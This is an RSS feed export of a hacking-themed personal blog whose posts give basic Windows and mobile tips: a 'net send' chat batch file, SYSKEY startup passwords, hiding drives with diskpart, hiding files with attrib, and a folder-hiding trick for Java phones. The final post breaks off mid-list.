<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>latest-cracker</title><description>hacker sachin rajak</description><managingEditor>noreply@blogger.com (Latest-cracker)</managingEditor><pubDate>Fri, 1 Nov 2024 14:30:04 +0530</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">100</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://latest-cracker.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><copyright>latest-carcker</copyright><itunes:image href="http://i1100.photobucket.com/albums/g418/mishalml007/Subscribel.jpg"/><itunes:keywords>latest,cracker,blogspot,com,latest,cracker,latestcracker,sachin,rajak</itunes:keywords><itunes:summary>notepad tricks,facbook phising page,pc tricks</itunes:summary><itunes:subtitle>latest-cracker</itunes:subtitle><itunes:category text="Education"><itunes:category text="Educational Technology"/></itunes:category><itunes:author>sachin rajak</itunes:author><itunes:owner><itunes:email>noreply@blogger.com</itunes:email><itunes:name>sachin rajak</itunes:name></itunes:owner><xhtml:meta content="noindex" name="robots" xmlns:xhtml="http://www.w3.org/1999/xhtml"/><item><title>Chat with Friends through Command Prompt</title><link>http://latest-cracker.blogspot.com/2013/02/chat-with-friends-through-command-prompt.html</link><pubDate>Sat, 16 Feb 2013 22:35:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-6452711417615383627</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="sites-layout-tile sites-tile-name-header" style="background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px; padding: 10px 10px 0px;"&gt;
&lt;div dir="ltr"&gt;
&amp;nbsp;&lt;span style="color: #274e13; font-size: small;"&gt;&lt;b&gt;Hello friends Now U Can Chat With Command Prompt THrough So Here IS A Trick.....&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;hr size="2" width="100%" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="sites-layout-tile sites-tile-name-content-1" style="background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px; padding: 10px;"&gt;
&lt;div dir="ltr"&gt;
&lt;b&gt;1) All you need is your friend's IP Address and your Command Prompt.&lt;br /&gt;&lt;br /&gt;2) Open Notepad and write this code as it is.....!&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;:A&lt;br /&gt;Cls&lt;br /&gt;echo MESSENGER&lt;br /&gt;set /p n=User:&lt;br /&gt;set /p m=Message:&lt;br /&gt;net send %n% %m%&lt;br /&gt;Pause&lt;br /&gt;Goto A&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3) Now save this as "Messenger.Bat".&lt;br /&gt;&lt;br /&gt;4) Open Command Prompt.&lt;br /&gt;&lt;br /&gt;5) Drag this file (.bat file) over to Command Prompt and press Enter.&lt;br /&gt;&lt;br /&gt;6) You would then see something like this:&lt;br /&gt;&lt;br /&gt;&lt;div style="margin-left: auto; margin-right: auto; text-align: center;"&gt;
&lt;a href="http://www.hackersonlineclub.com/chat-with-friends-through-command-prompt/imessenger.gif?attredirects=0" imageanchor="1" style="background-image: none; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; color: rgb(0, 82, 20) !important;"&gt;&lt;img border="0" src="http://www.hackersonlineclub.com/_/rsrc/1268371547835/chat-with-friends-through-command-prompt/imessenger.gif" style="border: 0px; padding: 0px;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&amp;nbsp;&lt;br /&gt;7) Now, type the IP Address of the computer you want to contact and press enter&lt;br /&gt;You will see something like this:&lt;br /&gt;&amp;nbsp;&lt;div style="margin-left: auto; margin-right: auto; text-align: center;"&gt;
&lt;a href="http://www.hackersonlineclub.com/chat-with-friends-through-command-prompt/imessenger2.gif?attredirects=0" imageanchor="1" style="background-image: none; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; color: rgb(0, 82, 20) !important;"&gt;&lt;img border="0" src="http://www.hackersonlineclub.com/_/rsrc/1268371583374/chat-with-friends-through-command-prompt/imessenger2.gif" style="border: 0px; padding: 0px;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;8) Now all you need to do is type your message and press Enter.&lt;br /&gt;Start Chatting.......!&lt;br /&gt;&lt;div style="margin-left: auto; margin-right: auto; text-align: center;"&gt;
&lt;a href="http://www.hackersonlineclub.com/chat-with-friends-through-command-prompt/imessenger3.gif?attredirects=0" imageanchor="1" style="background-image: none; background-position: initial initial; background-repeat: initial initial; border-bottom-style: none; color: rgb(0, 82, 20) !important;"&gt;&lt;img border="0" src="http://www.hackersonlineclub.com/_/rsrc/1268371625324/chat-with-friends-through-command-prompt/imessenger3.gif" style="border: 0px; padding: 0px;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;DONE....ENJOY.~!!&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>TO PROTECT COMPUTER WITH UNIQUE PASSWORD (XP)</title><link>http://latest-cracker.blogspot.com/2012/08/to-protect-computer-with-unique.html</link><category>tricks</category><category>windows tricks</category><category>xp tricks</category><pubDate>Sun, 12 Aug 2012 19:05:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-535152511398081672</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://picasaweb.google.com/sahilmahajan91/HACKINGBegins?authkey=Gv1sRgCOH9_ITxzI-Teg#5558670944612701650" imageanchor="1" style="color: black; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjEK95dBF57_M-MY0eFBQdMhyphenhyphenBj1Yf6lzELz3Lwq1RBSVhe4jdhyphenhyphenvmPGz1G_wbB9QoIF5E_bYHg-Yen7TepzjLHofqe4e5bKzyRrJKQwzkdk6GyDT3yOZWo4R6RRupDfa8oRlyIu7DeDU/s200/tut-556-p.JPG" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&amp;nbsp;In this article i'll tell you how can you secure your system from being HACKED, every one knows that cracking Administrator password of any computer is familiar to everyone. We know the tricks and tips to Hack the password using Dreamveiw, Sam insider, CMD etc, lots of people Hack system with these techniques, So today i'll teach you how can you secure your system from these hacking techniques, Well there is no need to install any kind of additional software to protect&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.blogger.com/post-edit.g?blogID=7891543643515976736&amp;amp;postID=535152511398081672" name="more" style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;/a&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;your system, in XP there is an inbuilt feature from which you can protect your system from being HACKED. In our daily life Security is the main thing that effecting our life very widely, everyone wish that their data is placed in a secure manner and no one can access their system without permission. To protect your system from unauthorized persons just follow these steps.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt; &lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: 20px;"&gt;&lt;u&gt;Follow these steps to secure your system&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Click on&amp;nbsp; START button &amp;amp; then click on RUN.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Type "SYSKEY" . (window pop up on your screen)&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://picasaweb.google.com/sahilmahajan91/HACKINGBegins?authkey=Gv1sRgCOH9_ITxzI-Teg#5558675526552712690" imageanchor="1" style="color: black; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVstJsIvhUQ_4fZtdhpbxADnFL-gwXwP50CjjNvx4wz1tkE85jPtVeBgYTU8Yj029uJ7D1dW96pBYQD8h5y_hU4IAKErJtywzRBH2ULV5xcX7lN8k6mMEcP5u54Ko1QiTUU9bFKZYOssA/s200/syskey.JPG" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;Click on UPDATE button&lt;/b&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;. &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Point to &amp;nbsp;Password Start up &amp;amp; ENTER your password.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://picasaweb.google.com/sahilmahajan91/HACKINGBegins?authkey=Gv1sRgCOH9_ITxzI-Teg#5558678524842138930" imageanchor="1" style="color: black; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvCbhymfc5i4MJJw8nXjIeBC5-hZHGXSl9LPo1lvc4dXU-dwjIUlYeUda6rJjjWKu5W8tBGWZPZvX3wbmeMyZrUB4Iy0wZq20PkzavPNzrS4cRAKmwO-Dsg0e8a1GcdoJDvTt-E77U7fA/s200/syskey+1.JPG" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="173" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&lt;span style="font-size: x-small;"&gt;Click on OK button.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 20px;"&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;b&gt;WARNING:&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 20px;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;There is no other way to recover or hack this PASSWORD, if password is forgotten&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 20px;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;then you have to &amp;nbsp;install new OS in your system&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 20px;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt; &lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 20px;"&gt;&lt;b&gt;Note: After 3 attempts system should be RESTART automatically.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt; &lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 20px;"&gt;&lt;b&gt;&amp;nbsp;Hope this will be informative for you, kindly post your views or comments on this article.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjEK95dBF57_M-MY0eFBQdMhyphenhyphenBj1Yf6lzELz3Lwq1RBSVhe4jdhyphenhyphenvmPGz1G_wbB9QoIF5E_bYHg-Yen7TepzjLHofqe4e5bKzyRrJKQwzkdk6GyDT3yOZWo4R6RRupDfa8oRlyIu7DeDU/s72-c/tut-556-p.JPG" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>HIDE YOUR DRIVES FROM MY COMPUTER</title><link>http://latest-cracker.blogspot.com/2012/08/hide-your-drives-from-my-computer.html</link><category>tricks</category><category>windows tricks</category><pubDate>Sun, 12 Aug 2012 19:02:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-5557621498517396475</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://picasaweb.google.com/sahilmahajan91/HACKINGBegins?authkey=Gv1sRgCOH9_ITxzI-Teg#5559230251466963346" imageanchor="1" style="color: black; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieLt3eX1Y94qUYjR2kRF0-JZm7OashxZ9QRfIbNdRhbhx6oVUeVTXzCiuH8VH8veKjK2LVmCQEObQmghheg21Zh3gayHBNZ1ZEOudDWue_vf9XlI8AS2uaHjIrRX7wRbAqMshgRYChgjM/s200/Hide-Drive-Group-Policy-01.png" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt; &lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&amp;nbsp;In this article I'll teach you how to hide your drives for My Computer and secure your from misuse. Well their are mainly three methods to hide your drives in computer so no one can access those drives without your permission. Today I'll teach you an effective method to hide your drive partition from My Computer and make your data private and secure. Now a day everyone want to hide their drives because of&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.blogger.com/post-edit.g?blogID=7891543643515976736&amp;amp;postID=5557621498517396475" name="more" style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;/a&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;security reasons or to protect data from multiple users. To protect your data from misuse just follow these steps.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt; &lt;b style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;u&gt;Follow these steps to hide your drives&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;Click on START button &amp;amp; then click on RUN.&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;Type "DISKPART" &amp;nbsp;(window pop like cmd)&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://picasaweb.google.com/sahilmahajan91/HACKINGBegins?authkey=Gv1sRgCOH9_ITxzI-Teg#5559225726493955618" imageanchor="1" style="color: black; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8EICvDPlVXZO43QimU3mcJPJ9Haxb7WaE3poqfiNejrP_TQ3UrL3kF6Joc8gBFgG9rBmN_8WuQyHmzuct_hEfF3XYQLsg6Oz1rImGeVwdlc57zkPnzHHkAZwL8PCZV62piK5GRtdS5w4/s320/disk+prt.JPG" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;Type LIST VOLUME&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="http://picasaweb.google.com/sahilmahajan91/HACKINGBegins?authkey=Gv1sRgCOH9_ITxzI-Teg#5559228131393937042" imageanchor="1" style="color: black; margin-left: 1em; margin-right: 1em; outline: none;"&gt;&lt;img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkHv7f-9NEKCBP58hDUVettud4fk2ZzbO70DnJLUrhPMVnbPtb8qqEX7w2W822BJlpXO3sSG1DA5n38mKGP1D4GiErsmRXNM-vZb2adQsBNgT-JI8wRsEy3atdOJqAULmcc2T7EspINB0/s320/DISK+PART.JPG" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;Type which drive you want to hide..&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;Type SELECT VOLUME 3 (example: If we want to hide D drive then select volume 3 )&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;Volume 3 is the selected volume.&amp;nbsp;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;Now type REMOVE LETTER D.&amp;nbsp;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;DiskPart removed the drive letter.&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;li&gt;&lt;b&gt;Reboot your system.&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;span style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;By using this method you can easily hide your driver &amp;amp; make your data secure from misuse. To show the drive again in My Computer is simply done by changing the keyword "REMOVE" to "ASSIGN", just replacing these word you can easily show your drives in My Computer.&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt; &lt;b style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&amp;nbsp;Hope this will be informative for you, kindly post your views or comments on this article.&lt;/b&gt; &lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieLt3eX1Y94qUYjR2kRF0-JZm7OashxZ9QRfIbNdRhbhx6oVUeVTXzCiuH8VH8veKjK2LVmCQEObQmghheg21Zh3gayHBNZ1ZEOudDWue_vf9XlI8AS2uaHjIrRX7wRbAqMshgRYChgjM/s72-c/Hide-Drive-Group-Policy-01.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>how to make super hidden files or folders</title><link>http://latest-cracker.blogspot.com/2012/08/how-to-make-super-hidden-files-or.html</link><category>CMD TRICKS</category><pubDate>Sat, 4 Aug 2012 16:50:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-5595619579739878311</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b style="background-color: white; font-family: 'century gothic', verdana; font-size: small; line-height: 24px;"&gt;1. Open a command prompt&lt;br /&gt;
&lt;br /&gt;
Click Start button-&amp;gt; select Run -&amp;gt; type "cmd" ( XP )&lt;br /&gt;
&lt;br /&gt;
Click Start button-&amp;gt; type "cmd" in the seach box ( 7 )&lt;br /&gt;
&lt;br /&gt;
2. Then press Enter&lt;br /&gt;
&lt;br /&gt;
3. type "cd path_of_your_file" to go to place of your file&lt;/b&gt;&lt;b style="font-family: 'century gothic', verdana; font-size: small; line-height: 24px;"&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
4. then type "dir" to view content of folder&lt;br /&gt;
&lt;br /&gt;
5. then type "attrib +s +h file's_name" then press Enter&lt;br /&gt;
6. then view again with "dir" command&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>HOW TO HIDE FOLDERS IN ANY MOBILE WITHOUT ANY SOFTWARE</title><link>http://latest-cracker.blogspot.com/2012/07/how-to-hide-folders-in-any-mobile.html</link><category>mobile tricks</category><category>tricks</category><pubDate>Sun, 29 Jul 2012 16:41:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-3322083792965409582</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;Hi Guys , We always have some data, which we want to protect or hide from others. We have many softwares and options to hide data or folders in computer. But here is a trick for your mobile , you can hide folders in your mobile as well and you don't need any software. This trick works for all Java mobiles.&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: blue; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;Just follow some simple steps&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="background-color: white; clear: both; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9FL2-R9QgoulCsseAqZW0UHX520oPhO48LF8gZ0j50nPUXxQi5RxUcQIRRTCPA-KpzbOJBG6ViyYGWfmt2uV7D15pdAgX-5dHOYf8W7cjQ9i7C7SxvEUhzvEWbeMYDybPAAYYayqk_t4/s1600/How-To-Hide-Folder-in-Nokia-Handset-With-Out-Any-Software.jpg" imageanchor="1" style="color: #771100; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img alt="hide or protect folder in mobile" border="0" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9FL2-R9QgoulCsseAqZW0UHX520oPhO48LF8gZ0j50nPUXxQi5RxUcQIRRTCPA-KpzbOJBG6ViyYGWfmt2uV7D15pdAgX-5dHOYf8W7cjQ9i7C7SxvEUhzvEWbeMYDybPAAYYayqk_t4/s320/How-To-Hide-Folder-in-Nokia-Handset-With-Out-Any-Software.jpg" style="border: none; position: relative;" title="Hide folder in mobile" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="background-color: white; clear: both; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px; text-align: center;"&gt;&lt;/div&gt;&lt;div style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;ul style="background-color: white; font-family: Verdana, sans-serif; font-size: 15px; line-height: 20px; list-style-image: initial; list-style-position: initial; margin: 0.5em 0px; padding: 0px 2.5em;"&gt;&lt;li style="border: none; margin: 0px 0px 0.25em; padding: 0px;"&gt;&lt;b&gt;Create any new folder or use existing folder that is to be hidden.&lt;/b&gt;&lt;/li&gt;
&lt;li style="border: none; margin: 0px 0px 0.25em; padding: 0px;"&gt;&lt;b&gt;Rename the folder with the extension of&amp;nbsp;&lt;span style="color: red;"&gt;.Jad&lt;/span&gt;&amp;nbsp;like you want to hide music folder , then name this folder&lt;span style="color: blue;"&gt;&amp;nbsp;music.jad&amp;nbsp;&lt;/span&gt;. Keep your data in this folder.&lt;/b&gt;&lt;/li&gt;
&lt;li style="border: none; margin: 0px 0px 0.25em; padding: 0px;"&gt;&lt;b&gt;Now create a new folder with the same name in the same directory but with the extension of&amp;nbsp;&lt;span style="color: red;"&gt;.jar&lt;/span&gt;&amp;nbsp;like you will give a name&lt;span style="color: blue;"&gt;music.jar&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style="border: none; margin: 0px 0px 0.25em; padding: 0px;"&gt;&lt;b&gt;And its done , Now your original folder with&amp;nbsp;&lt;span style="color: red;"&gt;.jad&lt;/span&gt;&amp;nbsp;extension get hidden and only folder with&amp;nbsp;&lt;span style="color: red;"&gt;.jar&lt;/span&gt;&amp;nbsp;extension will be visible, which is empty.&lt;/b&gt;&lt;/li&gt;
